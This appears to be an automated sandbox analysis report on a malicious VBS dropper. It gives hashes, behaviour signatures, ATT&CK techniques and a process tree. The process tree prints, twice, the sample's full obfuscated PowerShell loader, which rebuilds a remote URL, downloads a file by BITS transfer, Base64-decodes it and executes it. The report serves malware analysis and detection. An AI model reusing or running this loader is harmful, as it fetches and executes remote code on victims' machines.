8e08a7b594ff9f05683355f4f772205eead36aaec859295d68d24f6f5931a3ed

General

Target

98ac0a744497cf22f08ae5e2e49eba547253f7824b2a76ecfd7cf786dd1b34ce.vbs
Size

157KB
MD5

23a71377b58f082202b467da8c693dc0
SHA1

083cdeb1f92b0073e9db107b39b439239cfebff2
SHA256

98ac0a744497cf22f08ae5e2e49eba547253f7824b2a76ecfd7cf786dd1b34ce
SHA512

1e3ba4a2837c503a05bdfaa74da61d56e60a60e19ca023f90b90eb02a19d01ba8593e0b6329ad92d15f3a8cb4bc173927a64f9bef3d7ee92f3cc6708b157d26c
SSDEEP

3072:OaV5NSZh/awGqU42RvG+q4xgc3RR+vsZbqXRF1kEcVwJbknkxvQqTSTw8aP:XNSn/s42Rvrq4xgc3RR+vYbqXRFtcVw1

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	2044	WScript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4768	536	WerFault.exe	89

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
916	powershell.exe
916	powershell.exe
536	powershell.exe
536	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	916	powershell.exe
Token: SeDebugPrivilege	536	powershell.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 2044 wrote to memory of 916	2044	WScript.exe	86
PID 2044 wrote to memory of 916	2044	WScript.exe	86
PID 916 wrote to memory of 536	916	powershell.exe	89
PID 916 wrote to memory of 536	916	powershell.exe	89
PID 916 wrote to memory of 536	916	powershell.exe	89

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\98ac0a744497cf22f08ae5e2e49eba547253f7824b2a76ecfd7cf786dd1b34ce.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Finish;++$Finish;$Finish=$Finish-1;Function Gyden ($Simplexet){$Solsortereders105=5;$Solsortereders105++;For($Knscellen9=5; $Knscellen9 -lt $Simplexet.Length-1; $Knscellen9+=$Solsortereders105){$Unlettered = 'substring';$Erhverserfaringens30=$Simplexet.$Unlettered.Invoke($Knscellen9, 1);$Insolubilisation=$Insolubilisation+$Erhverserfaringens30}$Insolubilisation;}$Doctrinist=Gyden 'Stridh,tenstTil.ntWi nep S,arsSerai:Meteo/,unni/ProjedAc,dee No slAmoroiUdelak AfsoaF,nditDesmoeForursDatoscSkolehSk upeMicrofNormk.Ordbgcvertio ndes.ParatiPre,elafmaa/Fagspw .esipMugge-J,nnacCondooKi,dentrjbotSponse Ret,n RbartMulti/PietepConnilSla bu R gegNon,ri.fearnWickesCentr/Enem.CEffekuMycoptLimnoe ebaSMedialUslu.iTro.ldIntegeChequr Skee/Ud,rkKTsninoInfecnRouent BrevrMultio KogelTubulkDigamaCarryr,ammeaCitrokGrundtDekokeSigtercubeheTopplrVrtsts Ufre. f mttWh,ftoDyspncidiol ';$Rootery=$Doctrinist.split([char]62);$Doctrinist=$Rootery[0];$Tympanomandibular=Gyden 'Tilori skibeTorbixChill ';$Invaliderendes = Gyden 'Tarry\Am.sssBradeyGasmes Refnw I.cooShad wUne.o6eks.t4 Ti.v\BehovWAnme iSph rnflugtdFelthoMoedtwMatross elvP S,nioSparkwDow.heImpecr T,auSH.stehElosveR,klvlSikkelSodfa\ lugtv aunc1See.a. Utop0Ch,de\Ce tip UnduoUniriwPygopeMeni.rStnkesGlebahG.seleBilaslSatyrlKalpa.Co.jueSkr,axPrecieUetab ';&($Tympanomandibular) (Gyden ' over$DistoB vinuEnskycKosmecVristi ste nStair= Dis,$Svi.eeFordonlntrivProgr:EkstrwbrnepiDecenn TndedUnpieiNegler Phot ') ;&($Tympanomandibular) (Gyden ' Elek$bumblISar fn BhutvReas a fortllangfiU,wead ranseFashir.entre,opren WashdHoloce GaffsSubma= Crip$AflggBAn iqu Unh,cBagvac MultipseudnKonfi+ S an$InterIPupi nPus,pvForsyaSculll puriiMaybidErotieTip er,laneeDogmen SejrdBlodleAtlets Abou ') ;&($Tympanomandibular) (Gyden 'Suger$SemisUAdenhn PatrdReveriGr ensVar,aoConchw Bis,nBalk,eAan.edReser Seafr=Towhe Comeu(Grain(FormagFeriewRumormPreraiE.ght NataswGeocei ,ddinNonro3.rgey2Begri_ Fynbp.morarBetaeo BlitcMirateCurstsCatalsAprop Tva.g-EliteFbordb Fene.P arshrfolkeoPrefacBa,laeBondesGenansSporiI Mcdod Noum=Befst$Br de{PolstPSyrefIEarthD Fjel}Tonol) seal.UdsejC PrstoRode.mTrassm umbeateleknMobildfortoL C.lti .ldenVa,teeAndro)J.nri Misan-TiradsHydropUnloal,enneiAfl.et rsco Saper[Tr,nscIgnomh WappaMa rorVenet]conch3,avnr4 Ble, ');&($Tympanomandibular) (Gyden ' ,isf$ St kSLi.eniCommom tetrolongwoStrmsmR,adf Smrbo=Sub.e Uniti$AllerU c ernBiopidChiliiphytosThreaoRes.nw H.pen.undeeLabskdD,ogs[In,es$ hakkUSter n PlumdNiveaiBullgsTopfaoDokumwLenchnPrecoe UrugdT,ibo.SupercDesoroCordiu.eaponDicalt S.bs-Immac2 Tegn]bromi ');&($Tympanomandibular) (Gyden 'Solar$ vanIUn,eraFell gDewantKomfutMalgoa MoulgBydelebabial,aremsopbrueD,sigr,anas=Subst( regnTEpipleOpregsIrsketTrioe-,ustePExfoda Paidtjellyhirrem Trac,$UnneaI RedynShunpvreg.saFlagelCarboiFacitdStdereRorgnrVacile ugl.nDesordHerb,e R.sasLystn).enua Bluse-algorAVi iln Arbed onst Obvpu(Brokk[,ispiIStedsnForfrtMargiP ,eketS.udirDistr]Condo:Amou.:ReskosautoliEm laz TskeeMisli Stan -OmdeleSkjo.qDisav .nter8 Post)Ti.ca ') ;if ($Iagttagelser) {.$Invaliderendes $Simoom;} else {;$Udsvejfning=Gyden 'Bord,SV,gndt.angeaEugenr on rtFy vr-Sil.aB F,rri olymtBastns RenkTShannr St,uaHrelsnSwagesalkymf HemaeU.advrSne l Sq an-Tvi,lS InteoUn,hrustat.rHvi,tcRefe,eQuint Vilhe$ AgroDRevseoIldtac Ef.et EftergasariAngaanSnd giWienesFa.totTe ep Stk e-Re.usD anbueRubb.sIndhetSkat,iTe.denP.godaAmvistD,sgaiLageroGileanProta Ani,o$Dgnv B GreauStrencKrystcSkrhaiDyrernSukke ';&($Tympanomandibular) (Gyden 'Binds$LokkeBIn,tiuGgehvcLikvic S rai Skr n ands=L,kal$humaneTungentinamvGru.p:oversaJ bmepStablpReprodKavalaFredstCenteaM gah ') ;&($Tympanomandibular) (Gyden 'ClumpIMalmhmSignapA.ordoconcerKernetPhysa-lic rMPlectoFristdAdamauKirtllWalpoeUudlu TalblB Polei StudtContes,ostbTHe.errAba saEpossnHirslsDysfafFlleseH ggerPerve ') ;$Buccin=$Buccin+'\Rec.Roo';while (-not $Kontinuiteterne) {&($Tympanomandibular) (Gyden 'Smugi$ rigsKdemoko Perfn NonstRebati Budbn ncasuReinfiKvantt BetaeUdvlgtHo.eyeAngstr SkvanKronpe Orth=After( IlbuTSlu se L vbsBagest Skry-,olumPfejlmaWrit,tAnforhAfrea Seism$ RaadBBeamluWrotecMilkscHorniiUnp in elv) Indv ') ;&($Tympanomandibular) $Udsvejfning;&($Tympanomandibular) (Gyden 'JigsaSStknitColonaHilstrOver,tswain-CandiSSatralPericedetace Fo epTim a Flor5Landg ');$Doctrinist=$Rootery[$Bagatelliseret++%$Rootery.count];}&($Tympanomandibular) (Gyden ' mish$HalvlSlydr.uSoothp Dibae Unpur Lej.a U fan Unf gIndlaeSequ,lFooleiTransc osamaDiffilN.turlExpatyFla.m Ltnin=Tilsp UddanGUmblee Blomt Calm-Twan C SpiloPicr.nBl.cktFiskeebactrn OmsttGigni ,resc$ Si aB S.inuDoedecCposlc L,geiNeopanTakse ');&($Tympanomandibular) (Gyden 'Galem$SundhaNonamtUheldr Fu locou tf PerliScotcsQu drkUnreg Fjern= Blnd Colle[Wash.SAbdulyTubersOplsntpar seAlencmU.tru. StriCUndlooBy.sonSeismvLysfoePteryr Ephetbehje].tkam:Enest:PiggeFImpr rUdarmoU.cremMetacB .aksaSla,tsDrenceResbo6L tit4 hensSBr detCirilrPhylliBegrenSelvfgNotot( Z ol$LnligSByronuKommipVenezeUn asrSt gea,okalnSmitsgInconehvlbnlT orriMi uscSympta VldelMess,l Ref,y Conf) Ra.k ');&($Tympanomandibular) (Gyden 'Opvar$Re,elAPo.ysnNa,cith,rdyiforegnC,untiIndl c DispoHistotTempoiForsvn TuppeMurst ,hive=Duasi Nr.r[Empl,SWhoneyDuef,s,irektserpeeM,nocmCon,e. Pro,TKom,ueaft.exMidfotSkytt.DukkeE lovensovevcAr hioOkapadDosisiGangun Kvasg Non,] .run:Bibel:GinniASlottSSnuffC Ra sIBankbIForma.SustaGkontie LinitUilebSPirattN,uverKommui Un inMonocg Stad(Affek$Enravamig.atFrdigr socio Ma if PreeiTindisTidenk Slut)Brems ');&($Tympanomandibular) (Gyden ' Maza$ ulgeutrikesStadteSammet,ankeeNeckg=,rimo$Uho,dA .dvanbo nhtArveti.phiun O dbiOverbcVand o.ntittHosteiBrittn lam,erense. QuotsA.tipuMisgibArb jsTendetacronrsmreniOutstn IllugDobbe( ehil2A exa9Kalku0Sukke9hoved9F.ynd3D mon, R en2Hulhe4Opbru4Entr,7To.al4 forh)Betvi ');&($Tympanomandibular) $usete;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:916
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Finish;++$Finish;$Finish=$Finish-1;Function Gyden ($Simplexet){$Solsortereders105=5;$Solsortereders105++;For($Knscellen9=5; $Knscellen9 -lt $Simplexet.Length-1; $Knscellen9+=$Solsortereders105){$Unlettered = 'substring';$Erhverserfaringens30=$Simplexet.$Unlettered.Invoke($Knscellen9, 1);$Insolubilisation=$Insolubilisation+$Erhverserfaringens30}$Insolubilisation;}$Doctrinist=Gyden 'Stridh,tenstTil.ntWi nep S,arsSerai:Meteo/,unni/ProjedAc,dee No slAmoroiUdelak AfsoaF,nditDesmoeForursDatoscSkolehSk upeMicrofNormk.Ordbgcvertio ndes.ParatiPre,elafmaa/Fagspw .esipMugge-J,nnacCondooKi,dentrjbotSponse Ret,n RbartMulti/PietepConnilSla bu R gegNon,ri.fearnWickesCentr/Enem.CEffekuMycoptLimnoe ebaSMedialUslu.iTro.ldIntegeChequr Skee/Ud,rkKTsninoInfecnRouent BrevrMultio KogelTubulkDigamaCarryr,ammeaCitrokGrundtDekokeSigtercubeheTopplrVrtsts Ufre. f mttWh,ftoDyspncidiol ';$Rootery=$Doctrinist.split([char]62);$Doctrinist=$Rootery[0];$Tympanomandibular=Gyden 'Tilori skibeTorbixChill ';$Invaliderendes = Gyden 'Tarry\Am.sssBradeyGasmes Refnw I.cooShad wUne.o6eks.t4 Ti.v\BehovWAnme iSph rnflugtdFelthoMoedtwMatross elvP S,nioSparkwDow.heImpecr T,auSH.stehElosveR,klvlSikkelSodfa\ lugtv aunc1See.a. Utop0Ch,de\Ce tip UnduoUniriwPygopeMeni.rStnkesGlebahG.seleBilaslSatyrlKalpa.Co.jueSkr,axPrecieUetab ';&($Tympanomandibular) (Gyden ' over$DistoB vinuEnskycKosmecVristi ste nStair= Dis,$Svi.eeFordonlntrivProgr:EkstrwbrnepiDecenn TndedUnpieiNegler Phot ') ;&($Tympanomandibular) (Gyden ' Elek$bumblISar fn BhutvReas a fortllangfiU,wead ranseFashir.entre,opren WashdHoloce GaffsSubma= Crip$AflggBAn iqu Unh,cBagvac MultipseudnKonfi+ S an$InterIPupi nPus,pvForsyaSculll puriiMaybidErotieTip er,laneeDogmen SejrdBlodleAtlets Abou ') ;&($Tympanomandibular) (Gyden 'Suger$SemisUAdenhn PatrdReveriGr ensVar,aoConchw Bis,nBalk,eAan.edReser Seafr=Towhe Comeu(Grain(FormagFeriewRumormPreraiE.ght NataswGeocei ,ddinNonro3.rgey2Begri_ Fynbp.morarBetaeo BlitcMirateCurstsCatalsAprop Tva.g-EliteFbordb Fene.P arshrfolkeoPrefacBa,laeBondesGenansSporiI Mcdod Noum=Befst$Br de{PolstPSyrefIEarthD Fjel}Tonol) seal.UdsejC PrstoRode.mTrassm umbeateleknMobildfortoL C.lti .ldenVa,teeAndro)J.nri Misan-TiradsHydropUnloal,enneiAfl.et rsco Saper[Tr,nscIgnomh WappaMa rorVenet]conch3,avnr4 Ble, ');&($Tympanomandibular) (Gyden ' ,isf$ St kSLi.eniCommom tetrolongwoStrmsmR,adf Smrbo=Sub.e Uniti$AllerU c ernBiopidChiliiphytosThreaoRes.nw H.pen.undeeLabskdD,ogs[In,es$ hakkUSter n PlumdNiveaiBullgsTopfaoDokumwLenchnPrecoe UrugdT,ibo.SupercDesoroCordiu.eaponDicalt S.bs-Immac2 Tegn]bromi ');&($Tympanomandibular) (Gyden 'Solar$ vanIUn,eraFell gDewantKomfutMalgoa MoulgBydelebabial,aremsopbrueD,sigr,anas=Subst( regnTEpipleOpregsIrsketTrioe-,ustePExfoda Paidtjellyhirrem Trac,$UnneaI RedynShunpvreg.saFlagelCarboiFacitdStdereRorgnrVacile ugl.nDesordHerb,e R.sasLystn).enua Bluse-algorAVi iln Arbed onst Obvpu(Brokk[,ispiIStedsnForfrtMargiP ,eketS.udirDistr]Condo:Amou.:ReskosautoliEm laz TskeeMisli Stan -OmdeleSkjo.qDisav .nter8 Post)Ti.ca ') ;if ($Iagttagelser) {.$Invaliderendes $Simoom;} else {;$Udsvejfning=Gyden 'Bord,SV,gndt.angeaEugenr on rtFy vr-Sil.aB F,rri olymtBastns RenkTShannr St,uaHrelsnSwagesalkymf HemaeU.advrSne l Sq an-Tvi,lS InteoUn,hrustat.rHvi,tcRefe,eQuint Vilhe$ AgroDRevseoIldtac Ef.et EftergasariAngaanSnd giWienesFa.totTe ep Stk e-Re.usD anbueRubb.sIndhetSkat,iTe.denP.godaAmvistD,sgaiLageroGileanProta Ani,o$Dgnv B GreauStrencKrystcSkrhaiDyrernSukke ';&($Tympanomandibular) (Gyden 'Binds$LokkeBIn,tiuGgehvcLikvic S rai Skr n ands=L,kal$humaneTungentinamvGru.p:oversaJ bmepStablpReprodKavalaFredstCenteaM gah ') ;&($Tympanomandibular) (Gyden 'ClumpIMalmhmSignapA.ordoconcerKernetPhysa-lic rMPlectoFristdAdamauKirtllWalpoeUudlu TalblB Polei StudtContes,ostbTHe.errAba saEpossnHirslsDysfafFlleseH ggerPerve ') ;$Buccin=$Buccin+'\Rec.Roo';while (-not $Kontinuiteterne) {&($Tympanomandibular) (Gyden 'Smugi$ rigsKdemoko Perfn NonstRebati Budbn ncasuReinfiKvantt BetaeUdvlgtHo.eyeAngstr SkvanKronpe Orth=After( IlbuTSlu se L vbsBagest Skry-,olumPfejlmaWrit,tAnforhAfrea Seism$ RaadBBeamluWrotecMilkscHorniiUnp in elv) Indv ') ;&($Tympanomandibular) $Udsvejfning;&($Tympanomandibular) (Gyden 'JigsaSStknitColonaHilstrOver,tswain-CandiSSatralPericedetace Fo epTim a Flor5Landg ');$Doctrinist=$Rootery[$Bagatelliseret++%$Rootery.count];}&($Tympanomandibular) (Gyden ' mish$HalvlSlydr.uSoothp Dibae Unpur Lej.a U fan Unf gIndlaeSequ,lFooleiTransc osamaDiffilN.turlExpatyFla.m Ltnin=Tilsp UddanGUmblee Blomt Calm-Twan C SpiloPicr.nBl.cktFiskeebactrn OmsttGigni ,resc$ Si aB S.inuDoedecCposlc L,geiNeopanTakse ');&($Tympanomandibular) (Gyden 'Galem$SundhaNonamtUheldr Fu locou tf PerliScotcsQu drkUnreg Fjern= Blnd Colle[Wash.SAbdulyTubersOplsntpar seAlencmU.tru. StriCUndlooBy.sonSeismvLysfoePteryr Ephetbehje].tkam:Enest:PiggeFImpr rUdarmoU.cremMetacB .aksaSla,tsDrenceResbo6L tit4 hensSBr detCirilrPhylliBegrenSelvfgNotot( Z ol$LnligSByronuKommipVenezeUn asrSt gea,okalnSmitsgInconehvlbnlT orriMi uscSympta VldelMess,l Ref,y Conf) Ra.k ');&($Tympanomandibular) (Gyden 'Opvar$Re,elAPo.ysnNa,cith,rdyiforegnC,untiIndl c DispoHistotTempoiForsvn TuppeMurst ,hive=Duasi Nr.r[Empl,SWhoneyDuef,s,irektserpeeM,nocmCon,e. Pro,TKom,ueaft.exMidfotSkytt.DukkeE lovensovevcAr hioOkapadDosisiGangun Kvasg Non,] .run:Bibel:GinniASlottSSnuffC Ra sIBankbIForma.SustaGkontie LinitUilebSPirattN,uverKommui Un inMonocg Stad(Affek$Enravamig.atFrdigr socio Ma if PreeiTindisTidenk Slut)Brems ');&($Tympanomandibular) (Gyden ' Maza$ ulgeutrikesStadteSammet,ankeeNeckg=,rimo$Uho,dA .dvanbo nhtArveti.phiun O dbiOverbcVand o.ntittHosteiBrittn lam,erense. QuotsA.tipuMisgibArb jsTendetacronrsmreniOutstn IllugDobbe( ehil2A exa9Kalku0Sukke9hoved9F.ynd3D mon, R en2Hulhe4Opbru4Entr,7To.al4 forh)Betvi ');&($Tympanomandibular) $usete;}"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:536
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 536 -s 2520
      4⤵
      Program crash
      PID:4768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 536 -ip 536
1⤵
PID:1280

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jqloaqax.wpq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/536-24-0x00000000059C0000-0x0000000005A26000-memory.dmp

Filesize
408KB

Download
memory/536-34-0x0000000005AF0000-0x0000000005E44000-memory.dmp

Filesize
3.3MB

Download
memory/536-44-0x0000000074BF0000-0x00000000753A0000-memory.dmp

Filesize
7.7MB

Download
memory/536-43-0x0000000007740000-0x0000000007754000-memory.dmp

Filesize
80KB

Download
memory/536-42-0x00000000076A0000-0x00000000076C2000-memory.dmp

Filesize
136KB

Download
memory/536-18-0x00000000027C0000-0x00000000027F6000-memory.dmp

Filesize
216KB

Download
memory/536-41-0x0000000008100000-0x00000000086A4000-memory.dmp

Filesize
5.6MB

Download
memory/536-20-0x0000000002770000-0x0000000002780000-memory.dmp

Filesize
64KB

Download
memory/536-21-0x00000000051E0000-0x0000000005808000-memory.dmp

Filesize
6.2MB

Download
memory/536-22-0x0000000005840000-0x0000000005862000-memory.dmp

Filesize
136KB

Download
memory/536-39-0x0000000007400000-0x0000000007496000-memory.dmp

Filesize
600KB

Download
memory/536-19-0x0000000074BF0000-0x00000000753A0000-memory.dmp

Filesize
7.7MB

Download
memory/536-38-0x00000000066A0000-0x00000000066BA000-memory.dmp

Filesize
104KB

Download
memory/536-35-0x00000000060D0000-0x00000000060EE000-memory.dmp

Filesize
120KB

Download
memory/536-36-0x0000000006100000-0x000000000614C000-memory.dmp

Filesize
304KB

Download
memory/536-37-0x0000000007A80000-0x00000000080FA000-memory.dmp

Filesize
6.5MB

Download
memory/536-23-0x00000000058E0000-0x0000000005946000-memory.dmp

Filesize
408KB

Download
memory/536-40-0x00000000072D0000-0x00000000072F2000-memory.dmp

Filesize
136KB

Download
memory/916-14-0x00007FFE276B0000-0x00007FFE28171000-memory.dmp

Filesize
10.8MB

Download
memory/916-13-0x000001E8BAAC0000-0x000001E8BAAE2000-memory.dmp

Filesize
136KB

Download
memory/916-17-0x000001E8A0430000-0x000001E8A0440000-memory.dmp

Filesize
64KB

Download
memory/916-15-0x000001E8A0430000-0x000001E8A0440000-memory.dmp

Filesize
64KB

Download
memory/916-16-0x000001E8A0430000-0x000001E8A0440000-memory.dmp

Filesize
64KB

Download
memory/916-47-0x00007FFE276B0000-0x00007FFE28171000-memory.dmp

Filesize
10.8MB

Download

Resubmissions

Analysis

Sharing